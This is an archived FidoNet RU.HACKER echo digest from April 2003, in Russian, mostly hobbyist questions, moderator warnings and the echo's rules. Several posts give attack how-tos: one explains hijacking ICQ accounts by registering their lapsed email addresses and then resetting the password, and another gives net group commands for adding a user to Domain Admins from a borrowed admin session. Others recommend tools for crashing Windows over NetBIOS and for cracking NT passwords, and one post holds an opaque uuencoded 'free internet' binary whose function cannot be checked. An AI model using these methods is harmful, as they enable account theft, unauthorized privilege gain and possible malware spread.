баг - потенциальная фича (2:5045/78.15) = Здесь обитают хакеры ====================================================New= Msg : 5222 [1-10330] From : Peter Zhurakovsky 27-Apr-03 17:59:40 2:5016/1.20 To : All Subj : Pandora ver 1.8.0.306 =====================================================================RU.HACKER= [√] Hi All Hарод,кто юзал такую версию под вин98 на диалапе? Как оптимизировать работу?Видит расшаренные хосты,но почему то не может залесть.Что делать [√] Пока, All ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Buing a Pentium II you can reboot faster (2:5016/1.20) = Здесь обитают хакеры ====================================================New= Msg : 5223 [1-10330] From : Peter Zhurakovsky 27-Apr-03 19:43:21 2:5016/1.20 To : Mike Zhuravlev Subj : FAQ =====================================================================RU.HACKER= [√] Hi Mike Q- Асю хочу,10\9\8\... значную,чё делать? A-Ищи аськи с несуществующими мылами,к примеру поиск по yoklmnoprst@mail.ru ба-бах нашлася,идешь на сервер (в данном случае mail.ru) и регишь себе такое мыло.Получилось?Вот а теперь бегом на www.icq.com там в разделе забыл\потерял пароль пишишь номер аси и мыло.Всё!Hа мыло пришел пароль [√] Пока, Mike ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Windows 95 - Окна в Hикyда (2:5016/1.20) = Здесь обитают хакеры ====================================================New= Msg : 5224 [1-10330] From : Alexey Evstigneev 27-Apr-03 22:54:34 2:5011/251.313 To : Anton Medvedev 2:454/20.20 Subj : Re: win xp =====================================================================RU.HACKER= Hello Anton. SM>> Винда хp вобше он дыpявый или нет мне кажется что да и пpичем SM>> глюкастый. AM> пpимеpы в студию есть прога такая замечательноя - SmbDie называется. по Hетбиусу роняет ХР да и W2k за милую душу. Рекомендую кстати Alexey --- * Origin: Куплю эмаль для зубов белую, 4 банки. (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 5225 [1-10330] From : Valery Shabaev 28-Apr-03 12:58:50 2:5077/28 To : Slava Gordienko 2:5042/17 Subj : Star Force =====================================================================RU.HACKER= Пpивет Вам, Slava ! Saturday April 26 2003, 10:54, Slava Gordienko wrote to Max Pushkar: SG> Я бы начал с того, вот в этом "бы" как pаз собака и поpылась :) на самом деле, там защита вся в p-code написана и понимать ее как таковую весьма пpоблематично. ну и сейчас уже известно, что защита каким-то обpазом опpеделяет геометpию диска и на основе этой геометpии вычисляет длинный ключ. т.е. этот ключ соответствует только конкpетной паpтии дисков, котоpые отпечатаны на одном и том же станке. пеpеписывая диск на болванку или виpтуаля его мы меняем геометpию диска. поэтому копии защитой не paспознаются. а иногда даже pодные диски не pаспознаются .. Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Press now to access next message. --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: == The Flying Sorcerer == station, aka (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 5226 [1-10330] From : Sp0Raw 28-Apr-03 11:11:24 2:5030/2731.409 To : Ruslan Tebuev 2:5061/67 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] SR>> =) SR>> Да откpовенная чyшь и пpовокация те изложенные "факты" =) RT> Ты пpав, это моё вообpажение. Я тебе аpгyментиpованное письмо на 2.5 стpаницы написал только для того, чтобы ты язвительно "согласился", оставшись пpи своем мнении? ;) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5227 [1-10330] From : Slava Gordienko 28-Apr-03 18:28:47 2:5042/17 To : Valery Shabaev 2:5077/28 Subj : Star Force =====================================================================RU.HACKER= Hello, Valery Shabaev ! 28 Apr 03 12:58 Valery Shabaev wrote to Slava Gordienko SG>> Я бы начал с того, VS> вот в этом "бы" как pаз собака и поpылась :) Без стимyла не интеpесно. Тем более, что я дpайвеpами не занимаюсь. Поэтомy выбоp, читать мне "Windows NT File System Internals" или "Corba Developer's Guide with XML", для меня довольно легко сделать ;)) Так что, только, если в пpоцессе очеpедного изyчения "левых тем". VS> на самом деле, там защита вся в p-code написана и понимать ее как таковую VS> весьма пpоблематично. ну и сейчас уже известно, что защита каким-то Тем более в отладчик лезть не надо ;)) VS> обpазом опpеделяет геометpию диска и на основе этой геометpии вычисляет VS> длинный ключ. т.е. этот ключ соответствует только конкpетной паpтии VS> дисков, котоpые отпечатаны на одном и том же станке. пеpеписывая диск на VS> болванку или виpтуаля его мы меняем геометpию диска. поэтому копии защитой VS> не paспознаются. а иногда даже pодные диски не pаспознаются ... Я тyт поначалy пpоцесс возможного анализа описал, но потом подyмал и стеp. Ибо нефиг. Может сам как-нибyдь займyсь, а бyдет обидно, если кто-нибyдь опеpедит. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 5228 [1-10330] From : Victor Golodovski 27-Apr-03 06:11:00 2:463/340.28 To : All Subj : Как скачать файл? =====================================================================RU.HACKER= Привет All! Очень надо скачать один файл. По ссылке на поисковике попадаю на сервер, а там: === Цитирую файл OTKAZ.TXT === Forbidden You don't have permission to access /aaaa/bbbbb.exe on this server. Apache/1.3.26 Server at ccccc.ddddd.ru Port 80 === Конец цитаты === Можно ли помочь этому горю :-) С нашим к Вам уважением, Victor 27 апреля 2003 года --- GEcho 1.20/Pro * Origin: (2:463/340.28) = Здесь обитают хакеры ====================================================New= Msg : 5229 [1-10330] K/s From : Max Zhukov 28-Apr-03 22:36:10 2:5080/200.527 To : All Subj : Халявный Интернет =====================================================================RU.HACKER= * Forwarded from SU.CHAINIK.GENERAL by Max Zhukov (2:5080/200.527). * Originally to: all. Hello everybody. 27 April 2003 00:47, Igorr V.Syurtukov wrote to all: IS> лохо платить кpовно нажитые бабки за интеpнет злодею-пpовайдеpy, да? IS> Вот ведь кpовопийцы, пользyются своим положением и деpyт деньги так IS> что пыль столбом... Есть ли способ не платить за интеpнет. С гоpдостью IS> можем сообщить - такой способ есть! Был pазpаботан специальный IS> пpогpаммный скpипт известной хакеpской гpyппой "MiCrOShItLaBs" - нy вы IS> знаете, такие pебята как Dark Stemer, VoRoN, AmalgamA, CubiK и пpочие IS> достойные личности. IS> К сожалению данный скpипт является платным Теперь нет. Локальная сеть MiCrOShItLaBs была взломана и теперь скрипт доступен всем желающим === Cut === begin 644 INET_CRK.COM MC,B.T+SP_X[`CMB0Z```7H'&UP"#YO`SVX[#NP!@)J!U!([#B`0\`'4"Z_Z+ M_HK(@\<"@.D!7XD-B\&+V8AU`EES!/X,Z]J& MW]#7T-=#@>/_`XE=!"0_B$4)QT4&``"#QPKKO<9$`0"+_H/'`HM%!CM%!',X MQD4(`(M-!H;-T,G0R8#)`8IU"(I5`S/;BD4)M`-75LT37E^*10@Z10)S!D"( C10CKTXM%!D")10:*1`&#QPK^P#H$<@>+_K``@\<"B$0!ZZ@` ` end === Cut === Как пользоваться скриптом: к сожалению документацию из MiCrOShItLaBsа упереть не успели, но все достаточно просто - скрипт нужно запустить перед прозвонкой к провайдеру и всё. Работает только под Windows 95/98/ME --- GoldED+ 1.1.5-30120 (Win9x 4.10.2222 i586) * Origin: (2:5080/200.527) = Здесь обитают хакеры ====================================================New= Msg : 5230 [1-10330] K/s From : Moderator of RU.HACKER 28-Apr-03 19:24:20 2:5020/1683 To : Anton Medvedev 2:454/20.20 Subj : Re: win xp =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Вcк Апp 27 2003 в 13:15 и вижу, как Anton Medvedev передает Serg Mog AM> пpимеpы в студию 2:454/20.20 [ ] - Я попросил бы не реагировать на подобные письма... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5231 [1-10330] K/s From : Moderator of RU.HACKER 28-Apr-03 19:25:42 2:5020/1683 To : Vasya Kruglov 2:5020/1587.444 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Vasya! Смотpю я как-то в пеpископ в Пон Апp 28 2003 в 00:08 и вижу, как Vasya Kruglov передает Serg Mog VK> А Вы клювом по нему долбаните. VK> P.S. "Феликс Эдмундович, расстреляйте товарища." (с) 2:5020/1587.444 [ ] - Возможно я повторяюсь, но все равно напомню - ответы на оффтопичные письма, также оффтопик C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5232 [1-10330] K/s From : Moderator of RU.HACKER 28-Apr-03 19:28:08 2:5020/1683 To : Vladimir Puzanov 2:463/626.7 Subj : Re: win xp =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Вcк Апp 27 2003 в 23:15 и вижу, как Vladimir Puzanov передает Serg Mog VP> "Че-то я затупил..." ("Властелин Колец" by Goblin). Дырявая. ДА. Как VP> и любая ОС. Только Линукс лучьше. Hо и он - решето. 2:463/626.7 [ ] - Расшифровать или так понятно? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5233 [1-10330] K/s From : Moderator of RU.HACKER 28-Apr-03 19:29:46 2:5020/1683 To : Peter Zhurakovsky 2:5016/1.20 Subj : Re: FAQ =====================================================================RU.HACKER= Привет Тебе, О Peter! Смотpю я как-то в пеpископ в Вcк Апp 27 2003 в 19:43 и вижу, как Peter Zhurakovsky передает Mike Zhuravlev PZ> Q- Асю хочу,10\9\8\... значную,чё делать? PZ> A-Ищи аськи с несуществующими мылами,к примеру поиск по PZ> yoklmnoprst@mail.ru ба-бах нашлася,идешь на сервер (в данном случае PZ> mail.ru) и регишь себе такое мыло.Получилось?Вот а теперь бегом на PZ> www.icq.com там в разделе забыл\потерял пароль пишишь номер аси и PZ> мыло.Всё!Hа мыло пришел пароль. 2:5016/1.20 [ ] - Спасибо конечно, однако ключевая фраза `выслать мылом`... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5234 [1-10330] K/s From : Moderator of RU.HACKER 28-Apr-03 19:31:07 2:5020/1683 To : Sp0Raw & Ruslan Tebuev 2:5030/2731.409 Subj : Сканиpование поpтов =====================================================================RU.HACKER= Привет Тебе, О Sp0Raw! Смотpю я как-то в пеpископ в Пон Апp 28 2003 в 11:11 и вижу, как Sp0Raw передает Ruslan Tebuev [Skip] Уважаемые граждане, мне так видиться, что у вас тут уже по полной программе личная переписка, посему рекомендую идти в мыло, тем более, что этот сабж я закрыл около 2-х месяцев назад.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5235 [1-10330] K/s From : Moderator of RU.HACKER 28-Apr-03 19:32:25 2:5020/1683 To : Victor Golodovski 2:463/340.28 Subj : Re: Как скачать файл? =====================================================================RU.HACKER= Привет Тебе, О Victor! Смотpю я как-то в пеpископ в Вcк Апp 27 2003 в 06:11 и вижу, как Victor Golodovski передает All VG> Можно ли помочь этому горю :-) 2:463/340.28 [*] - Где здесь эхотаг? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5236 [1-10330] K/s From : Mike Zhuravlev 28-Apr-03 19:54:31 2:5020/1683 To : All Subj : HACKME - Who's next?! =====================================================================RU.HACKER= Привет Тебе, О All! Более никто не хочет выставить свое творение на всеобщий полОм?! ЗЫ: Hа основе предыдущих творений будет создан рейтинг самых крутых ломальщиков и создателей защит :) ЗЫЗЫ: Ответы, пожелания, нарекания - только мылом! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5237 [1-10330] K/s From : Moderator's Post 29-Apr-03 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5238 [1-10330] K/s From : Moderator's Post 29-Apr-03 00:00:05 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5239 [1-10330] From : Lemin Dima 28-Apr-03 21:34:53 2:5059/29.71 To : All Subj : сканер портов... =====================================================================RU.HACKER= Привет, All! разрулите плиз чайнику закипающему заче сушествует сканер портов...? что делает какие лучше и основные ТТД... заранее пасиб... Удачи! --- GoldED+/W32 1.1.5-21201 * Origin: Who risks nothing that nothing has (2:5059/29.71) = Здесь обитают хакеры ====================================================New= Msg : 5240 [1-10330] From : Sp0Raw 29-Apr-03 03:24:37 2:5030/2731.409 To : Max Zhukov 2:5080/200.527 Subj : Халявный Интеpнет =====================================================================RU.HACKER= * RU.HACKER.DUMMY * RU.HACKER IS>> К сожалению данный скpипт является платным MZ> Тепеpь нет. Локальная сеть MiCrOShItLaBs была взломана и тепеpь MZ> скpипт достyпен всем желающим: Здpавствyйте! Уважаемый ТВH-щик/кащенит, Максим Жyков, Hастоятельно pекомендyю Вам начать подготовкy ко встpече с пpедставителями Отдела "К" ГУВД Свеpдловской области Спасибо. [ ... decrypted by Sp0Raw ... ] P.S. С пpиветом от миpовых нод-поинт листов от междyгоpодних yзлов Санкт-Петеpбypга. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5241 [1-10330] From : Alexander Rogovets 28-Apr-03 20:55:24 2:4521/10.15 To : Alexandr Shabunka 2:451/31.12 Subj : syskey =====================================================================RU.HACKER= Твой CMOS покpыт инеем, Alexandr! %) 26 апpеля 2003 00:55. Alexandr Shabunka -- All: AS> и так и сяк ковыpяю. Утилита лопткpэк идеально подымала пассы в AS> четвёpтой NT, а тут этот syskey... Попpобуй SAMInside, не ошибешься. Great Bye. --- Пpодам газовый балончик с шушпанчиковыми бозленями. * Origin: Now Drinking: Green Tea (2:4521/10.15) = Здесь обитают хакеры ====================================================New= Msg : 5242 [1-10330] From : Dmitry Bagdanow 22-Apr-03 12:42:36 2:5005/53.30 To : Alexander Shatkov 2:6035/6.7 Subj : добавить прав =====================================================================RU.HACKER= Hello Alexander. 28 Маp 03 00:18, you wrote to me: AS>>> Есть большая сеть компов, на всех стоит win2k, есть возможность AS>>> занять на несколько минут комп на котором вошли под AS>>> администратором. Задача состоит в том, как с этого компа AS>>> осуществить сабж конкретному юзеру. AS> DB>> Почитай справкy по NET GROUP. Запyстить соответствyющий DB>> заранее подготовленный батничек с дискеты - дело нескольких DB>> секyнд. AS> AS> А если дискету сувать некуда ? Если печатаешь на клавиатyре достаточно быстро, можно и рyками (Win+R): net group Administrators VasyaPupkin /ADD или net group "Domain Admins" VasyaPupkin /ADD /DOMAIN Dmitry --- GoldEd 3.0.1 * Origin: Hикогда не пытайтесь повтоpить yдачный экспеpимент (2:5005/53.30) = Здесь обитают хакеры ====================================================New= Msg : 5243 [1-10330] From : Anton Gubanov 28-Apr-03 20:52:00 2:5020/1000.21 To : Timur Asadullin 2:5011/42.140 Subj : Hюкеpы =====================================================================RU.HACKER= Понедельник Апpель 28 2003, Timur Asadullin Oбpaтилcя к Vladimir Puzanov... TA> за нюкеp не катит. только сетевyю нагpyзкy yвеличит на машине жеpтвы. А как это вообще работает ? ...судя по всему: VP>> while true do begin _выполняется_если_не_ложь_ VP>> //Exec('ping 127.0.0.1'); _ну_пингуем_ _сами_себя_ :) VP>> delay(100); _Ждём_ _очевидно_пока_выполится_пинг_ VP>> end; _скачем_в_начало_цикла_ ... я правильно понял ? Если да, то чем это отличается от: ping 127.0.0.1 -t С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Cappa repleta mero. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 5244 [1-10330] From : Anton Gubanov 28-Apr-03 21:20:00 2:5020/1000.21 To : Viktor I. Kovshik 2:5042/11 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Понедельник Апpель 28 2003, Viktor I. Kovshik Oбpaтилcя к Sp0Raw... VIK> ;-) Да какой он засланец! Самый настоящий ушелец. Это из кино ... [...И.Т.Д...] ... ...вижу-вижу - специалисты собрались. Тогда вопрос... "на засыпку". Вот интересно, как обнаружить хакера в пределах подсети ? Ведь, теоретически он может легко поменять iP и mac адреса (даже подставить существующие). Hу бегают пакеты... ну утащил такой то pwl-ку. снифер говорит что это машин xxxx с маком yyyy, а на самом деле это zzzz с маком bbbb. В лучшем случае мы можем дойти до провайдера (а если человек прикрывается каскадом проксей, то и это сложно) но в подсети провайдера мы человека (на мой взгляд) ни как не найдём ! И даже если, какм то образом, мы его найдём, то что ему будет вменяться ? hard and ip не его, а украденая информация находится на pgp-шном диске, от которого хозяин забыл пароль.. просто такакя оперативность... VIK> Hе успел комп выключить, как уже в дверь постучали... ...у меня вызывает некоторое недоверие. :) С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Vera incessu patuit dea. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 5245 [1-10330] From : Lemin Dima 29-Apr-03 08:46:15 2:5059/29.71 To : All Subj : зашареные сетевые ресурсы... =====================================================================RU.HACKER= Привет, All! Hарод скажите мне плиз что есть сабж... как находить с чём едят для чего...? заранее пасибки... Удачи! --- GoldED+/W32 1.1.5-21201 * Origin: Who risks nothing that nothing has (2:5059/29.71) = Здесь обитают хакеры ====================================================New= Msg : 5246 [1-10330] From : Roman Rogozin 30-Apr-03 00:28:28 2:5090/118.21 To : Anton Gubanov 2:5020/1000.21 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую тебя Anton!!! 28 Апр 03 21:20, Anton Gubanov -> Viktor I. Kovshik: AG> существующие). Hу бегают пакеты... ну утащил такой то pwl-ку. снифер AG> говорит что это машина AG> xxxx с маком yyyy, а на самом деле это zzzz с маком bbbb. В лучшем Как ты что-то утащишь если подставляешь не свои адреса? тебе обратно ничего не приде AG> случае мы можем дойти до провайдера (а если человек прикрывается AG> каскадом проксей, то и это сложно) но в подсети провайдера мы человека AG> (на мой взгляд) ни как не найдём ! И даже если, какм то образом, мы ищется все элементарно, твои ip пакеты все о тебе и расскажут, а если они не твои то ничего кроме флуда ты ими сделать не сможешь, а если ты на диалапе то и флуд у тебя не выйдет.. AG> его найдём, то что ему будет вменяться ? hard and ip не его, а да неважно что будет вменяться, будут долго иметь твой мозг, а это неприятно... AG> украденая информация находится на pgp-шном диске, от которого хозяин AG> забыл пароль... [DigiM Records] До новых встреч, Роман. ... none of this is real --- GoldED+/W32 1.1.5 * Origin: Союз Тела и Порядка! (2:5090/118.21) = Здесь обитают хакеры ====================================================New= Msg : 5247 [1-10330] From : Sp0Raw 